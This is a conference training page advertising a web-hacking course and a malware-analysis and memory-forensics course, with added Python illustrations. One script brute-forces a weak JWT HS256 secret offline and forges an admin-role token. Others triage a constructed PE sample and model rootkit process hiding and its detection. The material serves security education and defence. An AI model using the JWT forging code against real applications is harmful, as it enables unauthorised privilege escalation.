Trainings

This year we'll have trainings in the days leading up to the Conference!

Please note that the trainings are a separate event from the main conference. Training rooms will be at ISCTE-IUL, and the trainings run from the 25th to the 27th of November.

Available Trainings

Training                                                                             Early Bird Price (before 7 Oct)   Regular Price   Status
Advanced Web Hacking (3 Days) With NotSoSecure                                       €1499+VAT                         €1799+VAT       Registrations Closed
A Practical Approach To Malware Analysis And Memory Forensics (3 Days) by Monnappa   €1499+VAT                         €1799+VAT       Registrations Closed
Notes:
  • All registrations and payments will be handled by the training companies themselves;
  • Lunch is included on all days;
  • Trainees will also receive a ticket to access the conference.

Advanced Web Hacking (3 Days) With NotSoSecure

Action-packed web hacking class exploiting modern web application vulnerabilities such as SSRF, template injection, 2nd-order SQLi, deserialization, crypto flaws and more. Attacking authentication schemes such as JWT, SAML and OAuth. Learning esoteric out-of-band techniques and attack chaining.

Overview

This class teaches attendees a wealth of hacking techniques to compromise modern web applications, APIs and associated endpoints. It focuses on specific areas of appsec and on advanced vulnerability identification and exploitation techniques (especially server-side flaws). Attendees learn and practice some neat, new and ridiculous hacks that affected real-life products and have been reported through real bug-bounty programs. The vulnerabilities selected for the class either typically go undetected by modern scanners or have exploitation techniques that are not well known. Attendees will also benefit from a state-of-the-art Hacklab where they can practice the challenges.

Course Outline

  • Lab Setup and architecture overview
  • Burp Basics and Advanced Features
  • Attacking Authentication and SSO
    • Token Hijacking attacks
    • Logical Bypass / Boundary Conditions
    • Bypassing 2 Factor Authentication
    • Authentication Bypass using Subdomain Takeover
    • JWT Token Brute-Force attacks
    • SAML Authorization Bypass
    • OAuth Issues
  • Password Reset Attacks
    • Cookie Swap
    • Host Header Validation Bypass
    • Case study of popular password reset fails
  • Business Logic Flaws / Authorization Flaws
    • Mass Assignment
    • Invite/Promo Code Bypass
    • Replay Attack
    • API Authorisation Bypass
    • HTTP Parameter Pollution (HPP)
  • XML External Entity (XXE) Attack
    • XXE Basics
    • Advanced XXE Exploitation over OOB channels
    • XXE through SAML
    • XXE in File Parsing
  • Breaking Crypto
    • Known Plaintext Attack (Faulty Password Reset)
    • Padding Oracle Attack
    • Hash length extension attacks
    • Auth bypass using .NET Machine Key
  • Code Execution (RCE)
    • Java Serialization Attack
    • .NET Serialization Attack
    • Node.js Serialization Attack
    • PHP Serialization Attack
    • JSON Serialization Attack
    • Server Side Template Injection
  • SQL Injection Masterclass
    • 2nd order injection
    • Out-of-Band exploitation
    • SQLi through crypto
    • OS code exec via PowerShell
    • Advanced topics in SQLi
    • Advanced SQLMap Usage
    • Exploiting code injection over OOB channel
  • Tricky File Upload
    • Malicious File Extensions
    • Circumventing File validation checks
    • Exploiting hardened web servers.
  • Server Side Request Forgery (SSRF)
    • SSRF to query internal network
    • SSRF to call internal files
    • Various Case studies
  • Attacking the Cloud
    • SSRF Exploitation
    • Serverless exploitation
    • Google Dorking in the Cloud Era
    • Various Case Studies
  • Attacking Hardened CMS
    • Identifying and attacking various CMS
  • Web Caching Attacks
  • Attack Chaining: N-tier vulnerability chaining leading to RCE
  • Various Case Studies
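The outline lists "JWT Token Brute-Force attacks" under Attacking Authentication and SSO. The following is an added illustration of that technique, written for this page and not taken from the NotSoSecure course material. It assumes an HS256-signed token captured from the tester's own session and a small constructed wordlist; the signature is a pure function of the secret, so the attack runs entirely offline against the captured token and never touches the target. The second half shows why a recovered secret matters: it lets the attacker re-sign the token with altered claims.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_decode(segment: str) -> bytes:
    """JWT segments drop base64 padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build header.payload.signature with HMAC-SHA256 over the first two segments."""
    segments = [
        b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        b64url_encode(json.dumps(payload, separators=(",", ":")).encode()),
    ]
    signing_input = ".".join(segments).encode()
    signature = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return ".".join(segments + [b64url_encode(signature)])


def decode_payload(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def verify_hs256(token: str, secret: bytes) -> bool:
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def brute_force_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on the HS256 secret. Because only the captured token is
    needed, server-side rate limiting and account lockout never come into play."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token (alg={header.get('alg')!r})")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = b64url_decode(sig_b64)
    for candidate in candidates:
        attempt = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(attempt, target):
            return candidate
    return None


def forge_token(token: str, secret: str, **claims) -> str:
    """Re-sign the captured token with the recovered secret, overriding chosen claims."""
    header = json.loads(b64url_decode(token.split(".")[0]))
    payload = decode_payload(token)
    payload.update(claims)
    return sign_hs256(header, payload, secret.encode())


# Constructed inputs (not from any real application): a token a tester might capture from
# their own low-privilege session, signed with a weak secret, plus a tiny stand-in wordlist.
CAPTURED_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                            {"sub": "alice", "role": "user"}, b"changeme")
WORDLIST = ["password", "123456", "secret", "changeme", "letmein"]

if __name__ == "__main__":
    secret = brute_force_hs256(CAPTURED_TOKEN, WORDLIST)
    print("recovered secret:", secret)
    if secret:
        admin_token = forge_token(CAPTURED_TOKEN, secret, role="admin")
        print("forged admin token verifies:", verify_hs256(admin_token, secret.encode()))
```

The defence follows directly from the code: an HS256 secret must be a high-entropy random value of at least the hash output size (32 bytes), or the application should move to an asymmetric algorithm (RS256/ES256) so that possessing a token yields nothing to attack offline.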

Who should take this course

Developers, SOC analysts, entry-level and intermediate penetration testers, network engineers, security architects, security enthusiasts and anyone who wants to take their skills to the next level.

Student requirements

Students must bring their own laptop and have admin/root access on it. The laptop should have at least 4 GB of RAM, 20 GB of free disk space and a working copy of the latest Kali Linux. Kali should be run inside a virtual machine (e.g. VMware Workstation/Fusion/Player or VirtualBox).

What students will be provided with

Access to a hacking lab, not only during the course but for 15 days after the class, which gives attendees plenty of time to practice the concepts taught. Numerous scripts and tools will also be provided during the training, along with student handouts.

Check out the Advanced Web Hacking website at https://www.notsosecure.com/hacking-training/advanced-web-hacking/#overview

About the Trainer
Dhruv Shah is an information security professional working as a Principal Security Consultant at NotSoSecure. He has over seven years of experience in application, mobile and network security. He has co-authored the book 'Kali Linux Intrusion and Exploitation' published by Packt. His work can be found on security-geek.in. He is also a trainer of NotSoSecure's much-acclaimed Advanced Web Hacking class and has been a trainer at several leading public conferences such as Black Hat USA and Black Hat Europe. He has provided security training to various clients in the UK, EU and USA via corporate training.

A Practical Approach To Malware Analysis And Memory Forensics (3 Days) by Monnappa

This hands-on training teaches the concepts, tools and techniques to analyze, investigate and hunt malware by combining two powerful disciplines: malware analysis and memory forensics. The course introduces attendees to the basics of malware analysis, reverse engineering, Windows internals and memory forensics, then gradually progresses into more advanced concepts in both areas. Attendees will learn to perform static, dynamic, code and memory analysis. Each module is followed by scenario-based hands-on labs that involve analyzing real-world malware samples and infected memory images (crimeware, APT malware, fileless malware, rootkits, etc.). The training is designed to help attendees gain a solid understanding of the subject in a short span of time. Throughout the course, attendees will learn the latest techniques used by adversaries to compromise and persist on a system. The training also demonstrates how to integrate malware analysis and forensics techniques into a custom sandbox to automate the analysis of malicious code. After taking this course, attendees will be better equipped to analyze, investigate and respond to malware-related incidents.

The training provides practical guidance and attendees should walk away with the following skills:

  • How malware and Windows internals work
  • How to create a safe and isolated lab environment for malware analysis
  • What are the techniques and tools to perform malware analysis
  • How to perform static analysis to determine the metadata associated with malware
  • How to perform dynamic analysis of the malware to determine its interaction with process, file system, registry and network
  • How to perform code analysis to determine the malware functionality
  • How to debug malware using tools like IDA Pro, OllyDbg/Immunity Debugger/x64dbg
  • How to analyze downloaders, droppers, keyloggers, fileless malware, HTTP backdoors, etc.
  • What memory forensics is and its use in malware and digital investigations
  • How to acquire a memory image from suspect/infected systems
  • How to use the open-source advanced memory forensics framework (Volatility)
  • Understanding of the techniques used by malware to hide from live forensic tools
  • Understanding of the techniques used by rootkits (code injection, hooking, etc.)
  • Investigative steps for detecting stealthy and advanced malware
  • How memory forensics helps in malware analysis and reverse engineering
  • How to incorporate malware analysis and memory forensics in a sandbox
  • How to determine network- and host-based indicators of compromise (IOCs)
  • Techniques to hunt malware

COURSE CONTENTS

INTRODUCTION TO MALWARE ANALYSIS:

  • What is Malware
  • What they do
  • Why malware analysis
  • Types of malware analysis
  • Setting up an isolated lab environment

STATIC ANALYSIS:

  • Fingerprinting the malware
  • Extracting strings
  • Determining File obfuscation
  • Pattern matching using YARA
  • Fuzzy hashing & comparison
  • Understanding PE file characteristics
  • Disassembly
  • Hands-on lab exercise: analyzing a real malware sample
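The static analysis steps above (fingerprinting, string extraction, obfuscation checks, PE header characteristics) are the first triage pass on an unknown binary. As an added example, not part of the course material, here is a small Python triage script that performs those steps on a constructed PE-shaped byte blob built inline so it runs offline. The sample is not executable; only the DOS stub, PE signature and COFF file header are well-formed, and its strings (API names, a C2 URL on a TEST-NET address, UPX section names) are constructed for the demonstration. YARA matching and fuzzy hashing are left out because they need external libraries; the suspicious-API list and the UPX heuristic are the author's simplifications.

```python
import hashlib
import math
import re
import struct
from collections import Counter
from typing import List, Optional

# Win32 APIs whose presence in an unknown sample's strings merits a closer look (a
# deliberately short list chosen for this example, not an authoritative one).
SUSPICIOUS_APIS = {
    "CreateRemoteThread", "WriteProcessMemory", "VirtualAllocEx", "SetWindowsHookExA",
    "URLDownloadToFileA", "WinExec", "IsDebuggerPresent", "NtUnmapViewOfSection",
}
MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0x01C0: "ARM", 0xAA64: "ARM64"}


def build_constructed_sample() -> bytes:
    """Constructed PE-shaped blob: DOS header, PE signature, COFF header, then a body with
    the kind of strings a dropper that performs process injection might carry."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ") + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\x00" * (e_lfanew - len(dos))
    coff = b"PE\x00\x00" + struct.pack(
        "<HHIIIHH",
        0x014C,       # Machine: IMAGE_FILE_MACHINE_I386
        2,            # NumberOfSections
        0x5F0E1A2B,   # TimeDateStamp (arbitrary constructed value)
        0, 0,         # PointerToSymbolTable, NumberOfSymbols
        0xE0,         # SizeOfOptionalHeader (PE32)
        0x0102,       # Characteristics: EXECUTABLE_IMAGE | 32BIT_MACHINE
    )
    body = (
        b"\x00" * 32
        + b"UPX0\x00UPX1\x00"                    # section names typical of a UPX-packed file
        + b"\x00" * 16
        + b"kernel32.dll\x00CreateRemoteThread\x00WriteProcessMemory\x00VirtualAllocEx\x00"
        + b"http://203.0.113.10/gate.php\x00"   # constructed C2 URL on a TEST-NET-3 address
        + b"Global\\Dropper-Mutex-7f3a\x00"
        + bytes(range(256)) * 2                  # high-entropy filler standing in for packed data
    )
    return bytes(dos + coff + body)


def fingerprint(data: bytes) -> dict:
    """Hashes used to look the sample up in VirusTotal, MISP, internal case notes, etc."""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def shannon_entropy(data: bytes) -> float:
    """0.0 for a constant byte, 8.0 for uniform random bytes; packed or encrypted
    regions usually sit above about 7 bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Printable-ASCII runs, the same heuristic the `strings` utility uses."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def parse_pe_header(data: bytes) -> Optional[dict]:
    """Return the COFF file header fields, or None if the blob is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine, nsect, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "sections": nsect,
        "timestamp": ts,                       # compile time claimed by the linker (can be forged)
        "optional_header_size": opt_size,
        "is_executable": bool(chars & 0x0002),  # IMAGE_FILE_EXECUTABLE_IMAGE
        "is_dll": bool(chars & 0x2000),         # IMAGE_FILE_DLL
    }


def triage(data: bytes) -> dict:
    strings = extract_strings(data)
    return {
        "hashes": fingerprint(data),
        "entropy": round(shannon_entropy(data), 2),
        "pe": parse_pe_header(data),
        "suspicious_apis": sorted(s for s in strings if s in SUSPICIOUS_APIS),
        "urls": [s for s in strings if s.startswith(("http://", "https://"))],
        "packer_hints": sorted(s for s in strings if s.startswith("UPX")),
    }


if __name__ == "__main__":
    for key, value in triage(build_constructed_sample()).items():
        print(f"{key}: {value}")
```

Run it on a real sample by replacing build_constructed_sample() with the file's bytes, inside the isolated lab the course describes. The output is a starting point, not a verdict: the API names and packer hints say where to look during code analysis, and the hashes are what you pivot on in threat-intelligence sources.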

DYNAMIC ANALYSIS/BEHAVIOURAL ANALYSIS:

  • Dynamic Analysis Steps
  • Understanding Dynamic Analysis tools
  • Simulating services
  • Performing Dynamic Analysis
  • Monitoring process, filesystem, registry and network activity
  • Determining the Indicators of compromise (host and network indicators)
  • Demo: static and dynamic analysis of a real malware sample
  • Hands-on lab exercise: analyzing a real malware sample

AUTOMATING MALWARE ANALYSIS (SANDBOX):

  • Custom Sandbox Overview
  • Working of Sandbox
  • Sandbox Features
  • Demo – Analyzing malware in the custom sandbox

CODE ANALYSIS:

  • Code Analysis Overview
  • Disassembler & Debuggers
  • Code Analysis Tools
  • Basics of IDA Pro
  • Basics of Ollydbg/x64dbg
  • Understanding the API calls
  • Reversing malware functionalities (downloader, dropper, keylogger, code injection, HTTP backdoor)
  • Hands-on lab exercise: analyzing a real malware sample

INTRODUCTION TO MEMORY FORENSICS:

  • What is Memory Forensics
  • Why Memory Forensics
  • Steps in Memory Forensics
  • Memory acquisition and tools
  • Acquiring memory from a physical machine
  • Acquiring memory from a virtual machine
  • Hands-on exercise: acquiring memory

VOLATILITY OVERVIEW:

  • Introduction to Volatility Advanced Memory Forensics Framework
  • Volatility Installation
  • Volatility basic commands
  • Determining the profile
  • Volatility help options
  • Running the plugin

INVESTIGATING PROCESSES:

  • Understanding process internals
  • Process (EPROCESS) structure
  • Process organization
  • Process enumeration by walking the doubly linked list
  • Process relationships (parent-child relationship)
  • Understanding DKOM attacks
  • Process enumeration using pool tag scanning
  • Volatility plugins to enumerate processes
  • Identifying malicious processes
  • Hands-on lab exercise (scenario based): investigating malware-infected memory
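The three items "process enumeration by walking the doubly linked list", "DKOM attacks" and "process enumeration using pool tag scanning" describe one story: a rootkit that unlinks its EPROCESS from the active-process list disappears from list walkers (Volatility's pslist, Task Manager), but the structure is still in the pool and can be carved by its tag (Volatility's psscan). As an added example, not from the course material, the following Python models that in a constructed memory image. The layout is simplified (a 32-byte block with the "Proc" tag, a PID, the flink/blink pair and a name); real EPROCESS offsets differ per Windows build, which is why Volatility needs a profile or symbol table.

```python
import struct
from typing import Dict, List, Tuple

POOL_TAG = b"Proc"     # tag Windows stamps on EPROCESS pool allocations
BLOCK_SIZE = 32        # constructed block size for this toy image
LINKS_OFFSET = 8       # offset of the {flink, blink} pair inside a block (our ActiveProcessLinks)


def build_image(procs: List[Tuple[int, str]]) -> Tuple[bytearray, int]:
    """Lay the process blocks out consecutively and link them into a circular list.
    flink/blink hold the address of the neighbour's LIST_ENTRY, as in real kernels."""
    image = bytearray(len(procs) * BLOCK_SIZE + 64)
    base, n = 16, len(procs)
    for i, (pid, name) in enumerate(procs):
        off = base + i * BLOCK_SIZE
        nxt = base + ((i + 1) % n) * BLOCK_SIZE + LINKS_OFFSET
        prv = base + ((i - 1) % n) * BLOCK_SIZE + LINKS_OFFSET
        image[off:off + 4] = POOL_TAG
        struct.pack_into("<III", image, off + 4, pid, nxt, prv)
        image[off + 16:off + 32] = name.encode().ljust(16, b"\x00")
    return image, base


def read_block(image: bytearray, off: int) -> Dict:
    pid, flink, blink = struct.unpack_from("<III", image, off + 4)
    name = image[off + 16:off + 32].split(b"\x00", 1)[0].decode()
    return {"offset": off, "pid": pid, "name": name, "flink": flink, "blink": blink}


def unlink_process(image: bytearray, off: int) -> None:
    """DKOM hiding: splice the block out of the list. The block itself is untouched,
    so the process keeps running (the scheduler uses other structures)."""
    blk = read_block(image, off)
    prev_off = blk["blink"] - LINKS_OFFSET
    next_off = blk["flink"] - LINKS_OFFSET
    struct.pack_into("<I", image, prev_off + LINKS_OFFSET, blk["flink"])      # prev.flink = next
    struct.pack_into("<I", image, next_off + LINKS_OFFSET + 4, blk["blink"])  # next.blink = prev


def walk_list(image: bytearray, head_off: int) -> List[Dict]:
    """pslist-style: follow flink from the head until it wraps around."""
    seen, off = [], head_off
    while True:
        blk = read_block(image, off)
        seen.append(blk)
        off = blk["flink"] - LINKS_OFFSET   # CONTAINING_RECORD(entry, block, links)
        if off == head_off or len(seen) > 4096:
            break
    return seen


def scan_pool(image: bytearray) -> List[Dict]:
    """psscan-style: carve every block carrying the tag, whether linked or not."""
    return [read_block(image, off)
            for off in range(0, len(image) - BLOCK_SIZE + 1, 4)
            if image[off:off + 4] == POOL_TAG]


def find_hidden(image: bytearray, head_off: int) -> List[int]:
    """Cross-view detection: anything the scanner finds that the list walk did not."""
    listed = {b["pid"] for b in walk_list(image, head_off)}
    return sorted(b["pid"] for b in scan_pool(image) if b["pid"] not in listed)


def demo() -> Tuple[List[int], List[int], List[int]]:
    # Constructed process set; evil.exe gets unlinked the way a DKOM rootkit would do it.
    procs = [(4, "System"), (100, "lsass.exe"), (200, "evil.exe"), (300, "explorer.exe")]
    image, base = build_image(procs)
    unlink_process(image, base + 2 * BLOCK_SIZE)
    return ([b["pid"] for b in walk_list(image, base)],
            [b["pid"] for b in scan_pool(image)],
            find_hidden(image, base))


if __name__ == "__main__":
    walked, scanned, hidden = demo()
    print("pslist :", walked)
    print("psscan :", scanned)
    print("hidden :", hidden)
```

Two caveats carry over to real investigations: pool scanning also returns terminated processes whose memory has not been reused, so a psscan-only hit is not proof of hiding until you cross-check with other views (threads, handles, VADs), and a sophisticated rootkit can overwrite the pool tag as well, which is why the course pairs scanning with the other enumeration techniques.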

INVESTIGATING PROCESS HANDLES & REGISTRY:

  • Objects and handles overview
  • Enumerating process handles using Volatility
  • Understanding Mutex
  • Detecting malware presence using mutex
  • Understanding the Registry
  • Investigating common registry keys using Volatility
  • Detecting malware persistence
  • Hands-on lab exercise (scenario based): investigating malware-infected memory

INVESTIGATING NETWORK ACTIVITIES:

  • Understanding malware network activities
  • Volatility Network Plugins
  • Investigating Network connections
  • Investigating Sockets
  • Hands-on lab exercise (scenario based): investigating malware-infected memory

INVESTIGATING PROCESS MEMORY:

  • Process memory Internals
  • Listing DLLs using Volatility
  • Identifying hidden DLLs
  • Dumping malicious executable from memory
  • Dumping DLLs from memory
  • Scanning memory for patterns (yarascan)
  • Hands-on lab exercise (scenario based): investigating malware-infected memory

INVESTIGATING USER-MODE ROOTKITS & FILELESS MALWARE:

  • Code Injection
  • Types of Code injection
  • Remote DLL injection
  • Remote Code injection
  • Reflective DLL injection
  • Hollow process injection
  • Demo – Case Study
  • Hands-on lab exercise (scenario based): investigating malware-infected memory

MEMORY FORENSICS IN SANDBOX TECHNOLOGY:

  • Sandbox Overview
  • Integrating Memory Forensics into a sandbox
  • Demo – showing the use of memory forensics in a custom sandbox

INVESTIGATING KERNEL-MODE ROOTKITS:

  • Understanding Rootkits
  • Understanding function call traversal in Windows
  • Levels of hooking/modification on Windows
  • Kernel Volatility plugins
  • Hands-on lab exercise (scenario based): investigating malware-infected memory
  • Demo – Rootkit Investigation

MEMORY FORENSIC CASE STUDIES:

  • Demo – Hunting an APT malware from Memory

REQUIREMENTS

Students should:

  • Be familiar with using Windows/Linux
  • Have an understanding of basic programming concepts (programming experience is not mandatory).

SYSTEM REQUIREMENTS

  • Laptop with minimum 6GB RAM and 40GB free hard disk space
  • Laptop with USB ports. The lab samples and custom Linux VM will be shared via USB sticks
  • VMware Workstation or VMware Fusion (even trial versions can be used).
  • A Windows operating system (preferably Windows 7 64-bit; Windows 8 and above are also fine) installed inside VMware Workstation/Fusion. You must have full administrator access to the Windows guest.

Note: VMware Player and VirtualBox are not suitable for this training. The lab setup guide will be sent to you after registration.

About the Trainer
Monnappa K A works for Cisco Systems as an information security investigator focusing on threat intelligence, investigation, and research of cyber espionage and advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis" and a member of the Black Hat review board. He is the creator of the Limon Linux sandbox and winner of the 2016 Volatility plugin contest. He is the co-founder of the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). His fields of interest include malware analysis, reverse engineering, memory forensics, and threat intelligence.

He has presented at various security conferences including Black Hat, FIRST, SEC-T, the 4SICS SCADA/ICS summit, DSCI, the National Cyber Defence Summit and Cysinfo meetings on topics including memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has conducted training sessions at Black Hat, BruCON, OPCDE, FIRST (Forum of Incident Response and Security Teams), SEC-T and the 4SICS SCADA/ICS cyber security summit. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA) and read his blog posts at https://cysinfo.com
Twitter: @monnappa22